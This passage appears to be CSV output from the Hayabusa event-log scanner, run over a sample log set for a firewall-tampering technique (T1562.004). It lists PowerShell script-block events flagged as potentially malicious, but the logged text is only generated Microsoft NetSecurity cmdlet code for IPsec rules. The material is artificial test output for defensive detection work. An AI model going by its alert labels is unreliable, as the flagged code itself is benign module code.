'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
